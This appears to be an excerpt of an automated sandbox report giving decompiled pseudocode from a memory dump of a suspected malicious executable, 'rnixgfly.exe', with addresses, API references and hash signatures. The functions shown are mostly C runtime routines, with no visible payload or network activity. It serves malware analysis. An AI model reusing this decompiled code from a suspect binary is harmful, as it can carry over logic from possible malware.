                      								if(_t84 == 0 || _t107 == 0) {
                      									L32:
                      									E0040579A(_t75, _t84, _t97, _t107);
                      									asm("int3");
                      									_push(8);
                      									_push(0x413538);
                      									E00401EE0(_t75, _t101, _t107);
                      									_t98 =  *(_t111 + 0x10);
                      									_t85 =  *(_t111 + 0xc);
                      									__eflags =  *_t98;
                      									if(__eflags >= 0) {
                      										_t103 = _t85 + 0xc + _t98[2];
                      										__eflags = _t85 + 0xc + _t98[2];
                      									} else {
                      										_t103 = _t85;
                      									}
                      									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
                      									_t108 =  *(_t111 + 0x14);
                      									_push( *(_t111 + 0x14));
                      									_push(_t98);
                      									_push(_t85);
                      									_t77 =  *((intOrPtr*)(_t111 + 8));
                      									_push( *((intOrPtr*)(_t111 + 8)));
                      									_t58 = E00403694(_t77, _t103, _t108, __eflags) - 1;
                      									__eflags = _t58;
                      									if(_t58 == 0) {
                      										_t61 = E00404404(_t103, _t108[0x18], E00402768( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
                      									} else {
                      										_t61 = _t58 - 1;
                      										__eflags = _t61;
                      										if(_t61 == 0) {
                      											_t61 = E00404414(_t103, _t108[0x18], E00402768( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
                      										}
                      									}
                      									 *(_t111 - 4) = 0xfffffffe;
                      									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
                      									return _t61;
                      								} else {
                      									 *_t107 = _t84;
                      									_push( &(_t101[8]));
                      									_push(_t84);
                      									L21:
                      									 *_t107 = E00402768();
                      									L29:
                      									 *(_t111 - 4) = 0xfffffffe;
                      									_t53 = _t75;
                      									L31:
                      									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
                      									return _t53;
                      								}
                      							}
                      						}
                      					} else {
                      						goto L30;
                      					}
                      				}
                      			}



















                      0x00403694
                      0x00403696
                      0x0040369b
                      0x004036a0
                      0x004036a2
                      0x004036a5
                      0x004036aa
                      0x004037ba
                      0x004037ba
                      0x004037ba
                      0x00000000
                      0x004036b9
                      0x004036b9
                      0x004036be
                      0x004036c8
                      0x004036ca
                      0x004036cf
                      0x004036d4
                      0x004036d4
                      0x004036d6
                      0x004036d9
                      0x004036de
                      0x00403700
                      0x00403700
                      0x00403703
                      0x00403706
                      0x00403724
                      0x00403727
                      0x00403766
                      0x00403769
                      0x0040376c
                      0x00403791
                      0x00403793
                      0x00000000
                      0x00403795
                      0x00403795
                      0x00403797
                      0x00000000
                      0x00403799
                      0x00403799
                      0x0040379e
                      0x004037a2
                      0x004037a2
                      0x004037a3
                      0x00000000
                      0x004037a3
                      0x00403797
                      0x0040376e
                      0x0040376e
                      0x00403770
                      0x00000000
                      0x00403772
                      0x00403772
                      0x00403774
                      0x00000000
                      0x00403776
                      0x00403787
                      0x00000000
                      0x0040378c
                      0x00403774
                      0x00403770
                      0x00403729
                      0x00403729
                      0x0040372d
                      0x00000000
                      0x00403733
                      0x00403733
                      0x00403735
                      0x00000000
                      0x0040373b
                      0x00403742
                      0x0040374a
                      0x0040374e
                      0x00403750
                      0x00403753
                      0x00403758
                      0x00403759
                      0x00000000
                      0x00403759
                      0x00403753
                      0x00000000
                      0x0040374e
                      0x00403735
                      0x0040372d
                      0x00403708
                      0x00403708
                      0x00000000
                      0x00403708
                      0x004036e5
                      0x004036e5
                      0x004036ea
                      0x004036ef
                      0x00000000
                      0x004036f1
                      0x004036f3
                      0x004036fc
                      0x0040370b
                      0x0040370d
                      0x004037cc
                      0x004037cc
                      0x004037d1
                      0x004037d2
                      0x004037d4
                      0x004037d9
                      0x004037de
                      0x004037e1
                      0x004037e4
                      0x004037e7
                      0x004037f0
                      0x004037f0
                      0x004037e9
                      0x004037e9
                      0x004037e9
                      0x004037f3
                      0x004037f7
                      0x004037fa
                      0x004037fb
                      0x004037fc
                      0x004037fd
                      0x00403800
                      0x00403809
                      0x00403809
                      0x0040380c
                      0x00403842
                      0x0040380e
                      0x0040380e
                      0x0040380e
                      0x00403811
                      0x00403828
                      0x00403828
                      0x00403811
                      0x00403847
                      0x00403851
                      0x0040385d
                      0x0040371b
                      0x0040371b
                      0x00403720
                      0x00403721
                      0x0040375b
                      0x00403762
                      0x004037a6
                      0x004037a6
                      0x004037ad
                      0x004037bc
                      0x004037bf
                      0x004037cb
                      0x004037cb
                      0x0040370d
                      0x004036ef
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004036be

                      APIs
                      Memory Dump Source
                      • Source File: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_rnixgfly.jbxd
                      Yara matches
                      Similarity
                      • API ID: AdjustPointer
                      • String ID:
                      • API String ID: 1740715915-0
                      • Opcode ID: 545f8a9253608014606d57981c5e6b4fc05d413ea05323f44a6b83220745b28c
                      • Instruction ID: c36bffaf7fe8f9e15fcbe67479aef6d6b820bcd02780ea586b95a92c856a1c7e
                      • Opcode Fuzzy Hash: 545f8a9253608014606d57981c5e6b4fc05d413ea05323f44a6b83220745b28c
                      • Instruction Fuzzy Hash: E45103F6600202AFDB299F21C840B6A7BA9EF40B06F14813FE805672D1D739EE41C798
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0040B766(void* _a4, long _a8, DWORD* _a12) {
                      				void* _t13;
                      
                      				_t13 = WriteConsoleW( *0x415880, _a4, _a8, _a12, 0);
                      				if(_t13 == 0 && GetLastError() == 6) {
                      					E0040B74F();
                      					E0040B711();
                      					_t13 = WriteConsoleW( *0x415880, _a4, _a8, _a12, _t13);
                      				}
                      				return _t13;
                      			}




                      0x0040b783
                      0x0040b787
                      0x0040b794
                      0x0040b799
                      0x0040b7b4
                      0x0040b7b4
                      0x0040b7ba

                      APIs
                      • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000), ref: 0040B77D
                      • GetLastError.KERNEL32(?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000,00000008,00000008,?,0040A922,00000000), ref: 0040B789
                        • Part of subcall function 0040B74F: CloseHandle.KERNEL32(FFFFFFFE,0040B799,?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000,00000008,00000008), ref: 0040B75F
                      • ___initconout.LIBCMT ref: 0040B799
                        • Part of subcall function 0040B711: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0040B740,0040AF0D,00000008,?,0040A37F,00000008,00000000,00000000,00000008), ref: 0040B724
                      • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000,00000008), ref: 0040B7AE
                      Memory Dump Source
                      • Source File: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_rnixgfly.jbxd
                      Yara matches
                      Similarity
                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                      • String ID:
                      • API String ID: 2744216297-0
                      • Opcode ID: 0cf35d0622a046613081d4d5705aad4e630b2f1f256b3374397953c6fad5f189
                      • Instruction ID: 9be2d2e95ebdf4ca364c863a04f8f34c4778b8d92ece9612039581527531bafd
                      • Opcode Fuzzy Hash: 0cf35d0622a046613081d4d5705aad4e630b2f1f256b3374397953c6fad5f189
                      • Instruction Fuzzy Hash: 72F01236400124BBCF162F96DC049CA3F65EB883B1B008435FA18A6161C7318870DBD8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 89%
                      			E00404751(void* __edx, intOrPtr _a4) {
                      				signed int _v8;
                      				void* _v12;
                      				char _v16;
                      				void* __ebx;
                      				void* __edi;
                      				intOrPtr* _t33;
                      				intOrPtr _t36;
                      				intOrPtr* _t41;
                      				intOrPtr* _t42;
                      				WCHAR* _t47;
                      				intOrPtr _t52;
                      				void* _t55;
                      				intOrPtr* _t56;
                      				intOrPtr _t57;
                      				intOrPtr _t58;
                      				intOrPtr _t61;
                      				intOrPtr _t64;
                      
                      				_t55 = __edx;
                      				_t57 = _a4;
                      				if(_t57 != 0) {
                      					if(_t57 == 2 || _t57 == 1) {
                      						GetModuleFileNameW(0, 0x415d20, 0x104);
                      						 *0x415f88 = 0x415d20;
                      						_t47 =  *0x415f9c; // 0x591c98
                      						if(_t47 == 0 ||  *_t47 == 0) {
                      							_t47 = 0x415d20;
                      						}
                      						_v8 = 0;
                      						_v16 = 0;
                      						_t61 = E00404A28(E00404887(_t47, 0, 0,  &_v8,  &_v16), _v8, _v16, 2);
                      						if(_t61 != 0) {
                      							E00404887(_t47, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
                      							if(_t57 != 1) {
                      								_push( &_v12);
                      								_v12 = 0;
                      								_t58 = E00406A91(0, _t55, _t57, _t61);
                      								if(_t58 == 0) {
                      									_t56 = _v12;
                      									_t52 = 0;
                      									_t33 = _t56;
                      									if( *_t56 == 0) {
                      										L17:
                      										 *0x415f8c = _t52;
                      										_v12 = 0;
                      										 *0x415f94 = _t56;
                      										E0040650B(0);
                      										_t58 = 0;
                      										L18:
                      										_v12 = 0;
                      										E0040650B(_t61);
                      										_t36 = _t58;
                      										goto L19;
                      									} else {
                      										goto L16;
                      									}
                      									do {
                      										L16:
                      										_t33 = _t33 + 4;
                      										_t52 = _t52 + 1;
                      									} while ( *_t33 != 0);
                      									goto L17;
                      								}
                      								E0040650B(_v12);
                      								goto L18;
                      							}
                      							 *0x415f94 = _t61;
                      							 *0x415f8c = _v8 - 1;
                      							goto L12;
                      						} else {
                      							_t41 = E0040649B();
                      							_push(0xc);
                      							_pop(0);
                      							 *_t41 = 0;
                      							L12:
                      							E0040650B(0);
                      							_t36 = 0;
                      							L19:
                      							goto L20;
                      						}
                      					} else {
                      						_t42 = E0040649B();
                      						_t64 = 0x16;
                      						 *_t42 = _t64;
                      						E004062A0();
                      						_t36 = _t64;
                      						L20:
                      						return _t36;
                      					}
                      				}
                      				return 0;
                      			}




















                      0x00404751
                      0x0040475a
                      0x0040475f
                      0x0040476c
                      0x00404798
                      0x0040479e
                      0x004047a4
                      0x004047ac
                      0x004047b3
                      0x004047b3
                      0x004047bb
                      0x004047c2
                      0x004047db
                      0x004047e2
                      0x00404801
                      0x0040480c
                      0x0040482f
                      0x00404831
                      0x00404839
                      0x0040483f
                      0x0040484b
                      0x0040484e
                      0x00404850
                      0x00404854
                      0x0040485e
                      0x0040485f
                      0x00404865
                      0x00404868
                      0x0040486e
                      0x00404873
                      0x00404875
                      0x00404877
                      0x0040487a
                      0x0040487f
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00404856
                      0x00404856
                      0x00404856
                      0x00404859
                      0x0040485a
                      0x00000000
                      0x00404856
                      0x00404844
                      0x00000000
                      0x00404844
                      0x00404812
                      0x00404818
                      0x00000000
                      0x004047e4
                      0x004047e4
                      0x004047e9
                      0x004047eb
                      0x004047ec
                      0x0040481f
                      0x00404821
                      0x00404826
                      0x00404881
                      0x00000000
                      0x00404882
                      0x00404773
                      0x00404773
                      0x0040477a
                      0x0040477b
                      0x0040477d
                      0x00404782
                      0x00404883
                      0x00000000
                      0x00404883
                      0x0040476c
                      0x00000000

                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_rnixgfly.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: ]A$C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe
                      • API String ID: 0-2581717928
                      • Opcode ID: 4b1e80dd0c630a597ae57bd7ace0b530a474018883af56ddac1066d4e5a9de18
                      • Instruction ID: 516f48771e3ea8525e46061b4c90816104fcc3183a12e04dc85d04e75a492b31
                      • Opcode Fuzzy Hash: 4b1e80dd0c630a597ae57bd7ace0b530a474018883af56ddac1066d4e5a9de18
                      • Instruction Fuzzy Hash: 0731D6B6A00214BFD711EF95DC819DFBBACEB85354B11847FF605B7281D6388D018B98
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 65%
                      			E00403C90(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                      				signed int _v8;
                      				signed int _v12;
                      				intOrPtr* _v16;
                      				signed int _v20;
                      				char _v24;
                      				intOrPtr _v28;
                      				signed int _v36;
                      				void* _v40;
                      				intOrPtr _v44;
                      				signed int _v48;
                      				intOrPtr _v56;
                      				void _v60;
                      				signed char* _v68;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* _t74;
                      				void* _t75;
                      				char _t76;
                      				signed char _t78;
                      				signed int _t80;
                      				signed char* _t81;
                      				signed int _t82;
                      				signed int _t83;
                      				intOrPtr* _t87;
                      				void* _t90;
                      				signed char* _t93;
                      				intOrPtr* _t96;
                      				signed char _t97;
                      				intOrPtr _t98;
                      				intOrPtr _t99;
                      				intOrPtr* _t101;
                      				signed int _t102;
                      				signed int _t103;
                      				signed char _t108;
                      				signed char* _t111;
                      				signed int _t112;
                      				signed char* _t116;
                      				void* _t121;
                      				signed int _t123;
                      				void* _t130;
                      				void* _t131;
                      
                      				_t110 = __edx;
                      				_t100 = __ecx;
                      				_t96 = _a4;
                      				if( *_t96 == 0x80000003) {
                      					return _t74;
                      				} else {
                      					_push(_t121);
                      					_t75 = E004029B3(_t96, __ecx, __edx, _t121);
                      					if( *((intOrPtr*)(_t75 + 8)) != 0) {
                      						__imp__EncodePointer(0);
                      						_t121 = _t75;
                      						if( *((intOrPtr*)(E004029B3(_t96, __ecx, __edx, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
                      							_t87 = E00402E31(__edx, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
                      							_t130 = _t130 + 0x1c;
                      							if(_t87 != 0) {
                      								L16:
                      								return _t87;
                      							}
                      						}
                      					}
                      					_t76 = _a20;
                      					_v24 = _t76;
                      					_v20 = 0;
                      					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
                      						_push(_a28);
                      						E00402D64(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
                      						_t112 = _v36;
                      						_t131 = _t130 + 0x18;
                      						_t87 = _v40;
                      						_v16 = _t87;
                      						_v8 = _t112;
                      						if(_t112 < _v28) {
                      							_t102 = _t112 * 0x14;
                      							_v12 = _t102;
                      							do {
                      								_t103 = 5;
                      								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
                      								_t131 = _t131 + 0xc;
                      								if(_v60 <= _t90 && _t90 <= _v56) {
                      									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
                      									_t108 = _t93[4];
                      									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
                      										if(( *_t93 & 0x00000040) == 0) {
                      											_push(0);
                      											_push(1);
                      											E0040386B(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
                      											_t112 = _v8;
                      											_t131 = _t131 + 0x30;
                      										}
                      									}
                      								}
                      								_t112 = _t112 + 1;
                      								_t87 = _v16;
                      								_t102 = _v12 + 0x14;
                      								_v8 = _t112;
                      								_v12 = _t102;
                      							} while (_t112 < _v28);
                      						}
                      						goto L16;
                      					}
                      					E0040579A(_t96, _t100, _t110, _t121);
                      					asm("int3");
                      					_t111 = _v68;
                      					_push(_t96);
                      					_push(_t121);
                      					_push(0);
                      					_t78 = _t111[4];
                      					if(_t78 == 0) {
                      						L41:
                      						_t80 = 1;
                      					} else {
                      						_t101 = _t78 + 8;
                      						if( *_t101 == 0) {
                      							goto L41;
                      						} else {
                      							_t116 = _a4;
                      							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
                      								_t97 = _t116[4];
                      								_t123 = 0;
                      								if(_t78 == _t97) {
                      									L33:
                      									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
                      										_t81 = _a8;
                      										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
                      											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
                      												_t123 = 1;
                      											}
                      										}
                      									}
                      									_t80 = _t123;
                      								} else {
                      									_t59 = _t97 + 8; // 0x6e
                      									_t82 = _t59;
                      									while(1) {
                      										_t98 =  *_t101;
                      										if(_t98 !=  *_t82) {
                      											break;
                      										}
                      										if(_t98 == 0) {
                      											L29:
                      											_t83 = _t123;
                      										} else {
                      											_t99 =  *((intOrPtr*)(_t101 + 1));
                      											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
                      												break;
                      											} else {
                      												_t101 = _t101 + 2;
                      												_t82 = _t82 + 2;
                      												if(_t99 != 0) {
                      													continue;
                      												} else {
                      													goto L29;
                      												}
                      											}
                      										}
                      										L31:
                      										if(_t83 == 0) {
                      											goto L33;
                      										} else {
                      											_t80 = 0;
                      										}
                      										goto L42;
                      									}
                      									asm("sbb eax, eax");
                      									_t83 = _t82 | 0x00000001;
                      									goto L31;
                      								}
                      							} else {
                      								goto L41;
                      							}
                      						}
                      					}
                      					L42:
                      					return _t80;
                      				}
                      			}













































                      0x00403c90
                      0x00403c90
                      0x00403c97
                      0x00403ca0
                      0x00403dbf
                      0x00403ca6
                      0x00403ca6
                      0x00403ca8
                      0x00403cb2
                      0x00403cb5
                      0x00403cbb
                      0x00403cc5
                      0x00403cea
                      0x00403cef
                      0x00403cf4
                      0x00403dbb
                      0x00000000
                      0x00403dbc
                      0x00403cf4
                      0x00403cc5
                      0x00403cfa
                      0x00403cfd
                      0x00403d00
                      0x00403d06
                      0x00403d0c
                      0x00403d1e
                      0x00403d23
                      0x00403d26
                      0x00403d29
                      0x00403d2c
                      0x00403d2f
                      0x00403d35
                      0x00403d3b
                      0x00403d3e
                      0x00403d41
                      0x00403d50
                      0x00403d51
                      0x00403d51
                      0x00403d56
                      0x00403d69
                      0x00403d6b
                      0x00403d70
                      0x00403d7b
                      0x00403d7d
                      0x00403d7f
                      0x00403d9b
                      0x00403da0
                      0x00403da3
                      0x00403da3
                      0x00403d7b
                      0x00403d70
                      0x00403da9
                      0x00403daa
                      0x00403dad
                      0x00403db0
                      0x00403db3
                      0x00403db6
                      0x00403d41
                      0x00000000
                      0x00403d35
                      0x00403dc0
                      0x00403dc5
                      0x00403dc9
                      0x00403dcc
                      0x00403dcd
                      0x00403dce
                      0x00403dcf
                      0x00403dd4
                      0x00403e4c
                      0x00403e4e
                      0x00403dd6
                      0x00403dd6
                      0x00403ddc
                      0x00000000
                      0x00403dde
                      0x00403de1
                      0x00403de4
                      0x00403deb
                      0x00403dee
                      0x00403df2
                      0x00403e24
                      0x00403e27
                      0x00403e2e
                      0x00403e34
                      0x00403e3e
                      0x00403e47
                      0x00403e47
                      0x00403e3e
                      0x00403e34
                      0x00403e48
                      0x00403df4
                      0x00403df4
                      0x00403df4
                      0x00403df7
                      0x00403df7
                      0x00403dfb
                      0x00000000
                      0x00000000
                      0x00403dff
                      0x00403e13
                      0x00403e13
                      0x00403e01
                      0x00403e01
                      0x00403e07
                      0x00000000
                      0x00403e09
                      0x00403e09
                      0x00403e0c
                      0x00403e11
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403e11
                      0x00403e07
                      0x00403e1c
                      0x00403e1e
                      0x00000000
                      0x00403e20
                      0x00403e20
                      0x00403e20
                      0x00000000
                      0x00403e1e
                      0x00403e17
                      0x00403e19
                      0x00000000
                      0x00403e19
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403de4
                      0x00403ddc
                      0x00403e4f
                      0x00403e53
                      0x00403e53

                      APIs
                      • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00403CB5
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_rnixgfly.jbxd
                      Yara matches
                      Similarity
                      • API ID: EncodePointer
                      • String ID: MOC$RCC
                      • API String ID: 2118026453-2084237596
                      • Opcode ID: eca3ff77fe2c4482fc0436b7e2b81c3f6b64dd45eb89c22104b1787426b2fa34
                      • Instruction ID: 27d9d21774ce73f4523aea127e5a37313707127f13db8d93af602d3374e0ea50
                      • Opcode Fuzzy Hash: eca3ff77fe2c4482fc0436b7e2b81c3f6b64dd45eb89c22104b1787426b2fa34
                      • Instruction Fuzzy Hash: E9415B72900109EFCF16DF94CE81AEEBBB9BF48305F1840AAF905B7291D3399A50DB54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 91%
                      			E004018D4(void* __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                      				intOrPtr _v0;
                      				void* _v808;
                      				int _t10;
                      				intOrPtr _t15;
                      				signed int _t16;
                      				signed int _t18;
                      				signed int _t20;
                      				intOrPtr _t23;
                      				intOrPtr _t24;
                      				intOrPtr _t25;
                      				intOrPtr _t26;
                      				intOrPtr _t27;
                      				intOrPtr _t28;
                      				intOrPtr _t29;
                      				intOrPtr* _t31;
                      				intOrPtr* _t33;
                      				void* _t36;
                      
                      				_t29 = __esi;
                      				_t28 = __edi;
                      				_t27 = __edx;
                      				_t24 = __ecx;
                      				_t23 = __ebx;
                      				_t36 = _t24 -  *0x415010; // 0xb1ab4d46
                      				if(_t36 != 0) {
                      					_t31 = _t33;
                      					_t10 = IsProcessorFeaturePresent(0x17);
                      					if(_t10 != 0) {
                      						_t24 = 2;
                      						asm("int 0x29");
                      					}
                      					 *0x415a48 = _t10;
                      					 *0x415a44 = _t24;
                      					 *0x415a40 = _t27;
                      					 *0x415a3c = _t23;
                      					 *0x415a38 = _t29;
                      					 *0x415a34 = _t28;
                      					 *0x415a60 = ss;
                      					 *0x415a54 = cs;
                      					 *0x415a30 = ds;
                      					 *0x415a2c = es;
                      					 *0x415a28 = fs;
                      					 *0x415a24 = gs;
                      					asm("pushfd");
                      					_pop( *0x415a58);
                      					 *0x415a4c =  *_t31;
                      					 *0x415a50 = _v0;
                      					 *0x415a5c =  &_a4;
                      					 *0x415998 = 0x10001;
                      					_t15 =  *0x415a50; // 0x0
                      					 *0x415954 = _t15;
                      					 *0x415948 = 0xc0000409;
                      					 *0x41594c = 1;
                      					 *0x415958 = 1;
                      					_t16 = 4;
                      					 *((intOrPtr*)(0x41595c + _t16 * 0)) = 2;
                      					_t18 = 4;
                      					_t25 =  *0x415010; // 0xb1ab4d46
                      					 *((intOrPtr*)(_t31 + _t18 * 0 - 8)) = _t25;
                      					_t20 = 4;
                      					_t26 =  *0x415014; // 0x4e54b2b9
                      					 *((intOrPtr*)(_t31 + (_t20 << 0) - 8)) = _t26;
                      					return E00401F2A("HYA");
                      				} else {
                      					return __eax;
                      				}
                      			}




















                      0x004018d4
                      0x004018d4
                      0x004018d4
                      0x004018d4
                      0x004018d4
                      0x004018d4
                      0x004018da
                      0x00401f53
                      0x00401f5d
                      0x00401f65
                      0x00401f69
                      0x00401f6a
                      0x00401f6a
                      0x00401f6c
                      0x00401f71
                      0x00401f77
                      0x00401f7d
                      0x00401f83
                      0x00401f89
                      0x00401f8f
                      0x00401f96
                      0x00401f9d
                      0x00401fa4
                      0x00401fab
                      0x00401fb2
                      0x00401fb9
                      0x00401fba
                      0x00401fc3
                      0x00401fcb
                      0x00401fd3
                      0x00401fde
                      0x00401fe8
                      0x00401fed
                      0x00401ff2
                      0x00401ffc
                      0x00402006
                      0x00402012
                      0x00402016
                      0x00402022
                      0x00402026
                      0x0040202c
                      0x00402032
                      0x00402036
                      0x0040203c
                      0x0040204b
                      0x004018dc
                      0x004018dc
                      0x004018dc

                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00401F5D
                      • ___raise_securityfailure.LIBCMT ref: 00402045
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_rnixgfly.jbxd
                      Yara matches
                      Similarity
                      • API ID: FeaturePresentProcessor___raise_securityfailure
                      • String ID: HYA
                      • API String ID: 3761405300-3949630065
                      • Opcode ID: 2add615a2287014fb40954335aba8a78c14fe77b94684ac88e063d6ce4629430
                      • Instruction ID: 6cb4d069ac1d3707beaa45bb2dd9a615a7934397750866ae2a5b0aac751b91a7
                      • Opcode Fuzzy Hash: 2add615a2287014fb40954335aba8a78c14fe77b94684ac88e063d6ce4629430
                      • Instruction Fuzzy Hash: 662103B56A1A01DBD310DF55F9D6AC43BA0BF88394F50D23AE5098ABB0D3B45880CF4E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004072F9() {
                      
                      				 *0x415f98 = GetCommandLineA();
                      				 *0x415f9c = GetCommandLineW();
                      				return 1;
                      			}



                      0x004072ff
                      0x0040730a
                      0x00407311

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_400000_rnixgfly.jbxd
                      Yara matches
                      Similarity
                      • API ID: CommandLine
                      • String ID: H4Y
                      • API String ID: 3253501508-676667341
                      • Opcode ID: 1862c5febd86a67a8cc931a8f9cf79bc572b9c2a7d58cda9ff65f2b50cd382cf
                      • Instruction ID: 1c3be78323f1457dba36cc2e926ef687e279e392227457d27b0df23f55036d34
                      • Opcode Fuzzy Hash: 1862c5febd86a67a8cc931a8f9cf79bc572b9c2a7d58cda9ff65f2b50cd382cf
                      • Instruction Fuzzy Hash: 92B09278800A20CFC7008F32FA4E2C87BA0B28820A780C876E919D2B20E7740022DF1C
                      Uniqueness

                      Uniqueness Score: -1.00%